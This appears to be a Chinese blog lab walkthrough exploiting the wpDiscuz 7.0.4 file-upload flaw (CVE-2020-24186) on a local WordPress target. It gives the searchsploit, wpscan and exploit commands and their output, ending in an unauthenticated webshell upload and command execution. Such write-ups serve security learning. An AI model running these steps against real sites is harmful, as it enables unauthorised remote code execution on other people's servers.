【wordpress-wpdiscuz-rce】

java 复制代码
┌──(root㉿kali)-[~]
└─# wpscan --url http://192.168.142.131:83/ --plugins-detection aggressive
┌──(root㉿kali)-[~]
└─# searchsploit wpdiscuz
-------------------------------------------------------------- ---------------------------------
 Exploit Title                                                |  Path
-------------------------------------------------------------- ---------------------------------
Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unau | php/webapps/49962.sh
WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unau | php/webapps/49967.py
Wordpress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary F | php/webapps/49401.rb
-------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

已知漏洞:

  1. 任意文件上传 (49962.sh)

  2. 远程代码执行 (49967.py)

  3. 未授权任意文件上传 (49401.rb)

这些漏洞都是针对 wpDiscuz 7.0.4 版本的。

将指定的 exploit 文件复制到当前工作目录:

┌──(root㉿kali)-[~]

└─# searchsploit -m 49967

Exploit: WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)

URL: https://www.exploit-db.com/exploits/49967

Path: /usr/share/exploitdb/exploits/php/webapps/49967.py

Codes: CVE-2020-24186

Verified: False

File Type: Python script, Unicode text, UTF-8 text executable, with very long lines (864)

Copied to: /root/49967.py

┌──(root㉿kali)-[~]

└─# python3 49967.py

+\] Specify an url target \[+\] Example usage: exploit.py -u http://192.168.1.81/blog -p /wordpress/2021/06/blogpost \[+\] Example help usage: exploit.py -h 所以我们找日志路径 ![](https://i-blog.csdnimg.cn/direct/ae7b20264e2f4285849f20a7d38ef97d.png)

python3 49967.py -u http://192.168.142.131:83 -p /2025/04/22/hello-world/

  • python3 49967.py:运行 Python exploit 脚本

  • -u http://192.168.142.131:83:指定目标 WordPress 站点的 URL

  • -p /2025/04/22/hello-world/:指定包含 wpDiscuz 评论插件的文章路径

java 复制代码
┌──(root㉿kali)-[~]
└─# python3 49967.py -u http://192.168.142.131:83 -p /2025/04/22/hello-world/
---------------------------------------------------------------
[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox
--------------------------------------------------------------- 

[+] Response length:[105102] | code:[200]
[!] Got wmuSecurity value: 501d0d4c77
[!] Got wmuSecurity value: 1 

[+] Generating random name for Webshell...
[!] Generated webshell name: fbmthofztipssba

[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:url":"http://192.168.142.131:83/wp-content/uploads/2026/01/fbmthofztipssba-1769068648.6248.php" 

这里回显成功上传webshell,访问这个路径可以看到数据

拼接cmd可以发现没有登录的情况下也能查看id等数据

相关推荐
青果全球http2 小时前
静态IP是什么意思?和动态IP有什么区别
网络·网络协议·tcp/ip
Anthony_2312 小时前
一、网络通信的本质与OSI模型
网络·网络协议·tcp/ip·http·https·udp·ssl
河码匠3 小时前
VXLAN 简介、实现虚拟机跨物理机通信和网络隔离
网络·vxlan
Sombra_Olivia3 小时前
Ubuntu22.04 安装Docker Vulhub遇到的问题
web安全·docker·vulhub
旖旎夜光4 小时前
Linux(11)(中)
linux·网络
猿码优创4 小时前
过滤境外ip和域名访问的解决方案
网络·网络协议·tcp/ip·安全·阿里云
运筹vivo@4 小时前
攻防世界: mfw
前端·web安全·php
code bean6 小时前
深入理解:NO_PROXY 如何绕过代理
网络·代理
lkbhua莱克瓦246 小时前
深入理解HTTP协议:从理论到SpringBoot实践
网络·笔记·后端·网络协议·http·javaweb